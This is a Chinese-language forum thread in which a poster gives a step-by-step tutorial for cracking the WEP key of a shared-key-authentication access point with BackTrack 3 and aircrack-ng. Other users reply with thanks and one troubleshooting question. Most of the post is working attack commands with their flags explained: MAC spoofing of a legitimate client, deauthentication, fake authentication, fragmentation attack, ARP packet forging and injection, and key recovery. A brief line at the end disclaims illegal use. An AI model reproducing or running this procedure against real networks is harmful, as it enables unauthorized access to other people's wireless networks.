[原创]BT3下破解共享密钥认证的WEP密码!

superconductor

当然先是制作中文版本（英文版的也可以）的可以启动BT3的U盘，这个论坛里很多人介绍怎么做了，在此就略过了。

然后要做的一步相当的重要，那就是卸载你用来攻击的无线网卡，并更改它的MAC为AP的无线客户端的MAC，一定是要合法无线客户端的MAC，要不然很难成功。我的网卡名为WIFI1,大家可以用命令先看下自己的网卡名。（因为我的笔记本内置的网卡也是ATHEROS芯片的，但是破解没有成功，所以改用ICOM 的SL-5200,此卡相当不错，支持a/b/g三频，而且支持到14频道，这个很难得。最后笔记本自带的网卡也成功破解了，证实是方法不当所致）

相应的命令为：

ifconfig –a

ifconfig –a wifi1 down

macchanger –m 00:1a:73:c5:31:e0 wifi1

这个命令中攻击用无线网卡的MAC必须用冒号隔开，这个命令以后对MAC的操作就不需要再用冒号隔开了，直接输数字和字母就可以了（十六进制）。

其中需要注意的就是这个伪装的MAC必须与AP的无线客户端相同，要不然很难成功，至少我是这样的。

ifconfig –a wifi1 up(加载攻击用无线网卡)

airmon-ng start wifi1 13

上面的13代表的是无线AP所工作的频道，2.4G WIFI用频率的最高频道为14频道。

图片中所示的“ath2”就是我们最后攻击所用的无线网卡的接口名。

准备工作完毕以后我们就可以开始了。

首先我们先开始收集ivs包。

相应的命令为：

airodump-ng – –ivs –w check – –bssid 00131004e526 –c 13 ath2

--ivs 表示只收集ivs包，

-w 后面表示收集ivs包所生成的文件名，但最后往往会在文件名后加上－01、－02等等，

--bssid 表示AP的MAC，这样做的好处就是只收集与这个MAC相对应的AP的ivs包，

-c 后面跟的AP的频道数。

这一步做完我们就可以开始正式的攻击了。

相应的攻击命令为：

aireplay-ng -0 1 –a 00131004e526 –c 001a73c5-31e0 ath2

-0 表示对无线客户端进行认证攻击，使无线客户端断线重连，以获得握手包。

1
表示攻击的次数，一般顺利的话1次就够了，不顺利的话攻击无数次都不成功，建议大家在纯的BT3下进行，VM下很难获得，我在VM做了N次，用WUSB54G V4只获得过一次握手包。

-a 后面跟的是AP的MAC，

-c 后面跟的所要攻击的无线客户端的MAC，记住这个参数一定是要-c，不能是-h哦。

攻击成功后会在airodump-ng的窗口的右上角出现捕获握手包的提示，它所保存的文件是以AP的MAC命名的XOR文件，注意与后面构建ARP包所必须的XOR文件相区别。

[此贴子已经被作者于2008-2-28 12:55:32编辑过]

superconductor

然后就是进行虚假认证攻击，相应的命令为：

aireplay-ng -1 0 –e LINKSYS –a 00131004e526 –y check-01-00-13-10-04-e5-26.xor ath2

-1 表示虚假认证攻击，

0 表示攻击延时，

-e 表示AP的ESSID，

-a 表示AP的MAC，

-y 表示捕获的握手包所生成的文件名。

看图中提示好像攻击只成功了一半，challenge是失败的，但是依然可以构建arp包，并成功进行注入攻击破解WEP密码。而且攻击会不断进行，我是用Ctrl+c来停止的。

然后就要开始进行－5攻击了，相应的命令为：

Aireplay-ng -5 –b 00131004e526 –h 001a73c531e0 ath2

出现“ Use this packet?”提示后输入“y”并回车。出现下面的画面就表示成功获得了构建arp包所必须的xor文件

获得xor文件以后我们就可以构建arp包了，相应的命令为：

packetforge-ng -0 –a 00131004e526 –h 001a73c531e0 –k 255.255.255.255 –l 255.255.255.255 –y fragment-0215-195944.xor –w arp

-l 是大写字母L的小写，不是1哦，

-y 后面跟的是构建arp包所必须的xor文件，

-w 后面跟的是构建的arp包所生成的文件名。

这一步以后我们就可以进行让DATA猛涨的注入式攻击了，相应的命令为：

aireplay-ng -2 –r arp –x 1024 ath2

-2 就是注入式攻击

-r 后面跟的是arp包文件名，

-x 定义所发送的攻击包的大小，最大为1024，默认为512，以大家可以稳定发送攻击包的大小为准，根据无线网卡的不同而不同。

大家可以看到一分钟的时间DATA数就从2万多增长到6万多了。

其实只要DATA数到大概5万的时候就可以开启实时破解了，相应的命令为:

aircrack-ng -n 128 *.ivs

最后说几句，大家输入命令的时候可以用键盘的“↑”“↓”来翻出以前输入过的命令，还有比如要反复输入的MAC可以用复制和粘贴来操作，这样可以方便许多。总之一句话，大家需要反复的实践才能获得你想要的知识，我就是在试了N次，试了N多的无线网卡才获得成功的，以前一直用的好好的的LINKSYS 的WUSB54G V4无线网卡居然死活不行，这个网卡可是WEP开放式、WPA、WPA2都成功破解过的啊，最后还是ICOM的笔记本网卡成功的。 实验过程中发现还是笔记本无线网卡来的好用，几乎不会出现攻击假死的情况，USB的经常碰到。

此文旨在交流经验以提高大家的无线安全意识，不得用于非法用途！

superconductor

其实用－3攻击是最方便，在客户端有相当流量的时候！为了方便大家参考学习，找出这个原始PDF文件供大家下载！ [ 本帖最后由 superconductor 于 2008-9-20 14:19 编辑 ]

longas

呵呵，终于有人发出了，不错，值得鼓励。

Tange，既然有人已发出来啦，那我年初1月份给你发的这篇预共享破解也可以发出来了，供大家参考吧：）

已经压了好多文章呀.......PS：楼主，我写的比你细，嘿嘿

[em05]

shalang

好文章啊！谢谢楼主了！可以试一下了！

beli

我这边也有一个共享密钥认证的AP，有空一定试试

superconductor

已经拜读longas老大的很多大作，确实是值得学习的。

接触无线破解不是很久，会慢慢熟悉的！

Tange赶紧把文章发上来，大家参考下！

superconductor

其实这篇文章也是得到longas版主的一张关于预共享WEP密码破解的照片的提示，不知道老大还记得不？

xtmnmn

不错~~！好好想你学习学习

superconductor

Tange赶紧把文章发上来，大家参考下！

tanxiao

请问楼主有没有遇到过 cann't allocate memory 提示，是怎么处理的

谢谢！